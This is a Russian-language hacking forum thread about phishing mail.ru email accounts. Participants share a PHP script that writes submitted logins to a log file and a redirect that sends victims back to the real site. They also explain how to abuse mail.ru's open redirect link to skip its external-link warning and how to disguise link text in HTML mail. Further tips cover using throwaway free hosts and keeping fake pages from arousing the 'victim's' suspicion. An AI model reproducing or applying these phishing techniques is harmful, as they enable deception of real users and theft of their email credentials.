Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail

PHP:

echo("Системная ошибка");

допустим замени на

PHP:

Header("Location: http://mail.ru");

mail.ru -- куда будет перекидывать пользователя.

 

Не подскажете как закодировали?
И ещё как в майл.ру http://img440.imageshack.us/my.php?image=39392793ap2.gif вставляете картинки в текст?

Кинь пожалуйста в личку то, что удалено, если нетрудно.

 

Закодировано при помощи charackter encoding calculator. Это урл значение.
Ресурс с калькулятором здесь, в самом низу http://ha.ckers.org/xss.html

 

Или просто скачать старый добрый InetCrack от Algola http://old.antichat.ru/inetcrack/ В любом случае, не лишняя программка.

 

Статья порадовала, СПС!

ВОТ!!! Вот этот постулат надо повесить в заголовке каждого раздела и разместить у каждого в профиле!!! А то скулёж из серии "хачу мыла, паламайте" уже настигает!!!

Подпишусь под каждым словом! Dronga, za4ёt !

 

Не один такой умный, уже все давно сделано

 

Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))

 

Подскажите, пожалуйста: Если имя текстового поля, которое надо записать Login, то куда его нужно подставлять в этом скрипте? и будет ли этого скрипта достаточно чтобы данные записались в log.php

<?php
$username=$_GET['username'];
if (isset($username))
{
$log_path="./log.php";
$log_string=$username." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>

 

xe0n2

PHP:

<?php
$Login=$_GET['Login'];
if (isset($Login))
{
$log_path="./log.php";
$log_string=$Login." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>


 

Поясните, пожалуйста, каким образом нужно писать ссылку, чтобы обойти эту табличку мейл.рушную?

 

со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)

 

Потому что кодировка пишется после адреса на каторый перекидывает,
Пиши так http://r.mail.ru/cln2863/www.ya.ru
и отсылай письмо с помощью хтмл, а там я надеюсь ты знаеш как визуально адрес изменить

Code:

<a herf=http://r.mail.ru/cln2863/www.ya.ru>http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F </a>

и будет счатя, я так обошел

 

Кодированные линки не будут работать в Internet Explorer 7.0 , на сайте microsoft-а читал, такую мазу они ввели видимо из соображений безопасности...
так что ребята, облом с URL-кодировой...

 

http://ha.ckers.org/xss.html

 

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу

 

А вот там уже нельзя, потому и рег левый бесплатный хост

 

А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают

 

Ни у всех ie :\ а уже что то даже на движке ие отоброжает адрестную строку! и вообще помните что малейшие различии от оригинала могут повергуть в сомнения жертву

 

а мона в Личку получить удалённый скриптик?

 

Так же, как и интернет...
Лежал где-то в сети кряк интернета - попробуй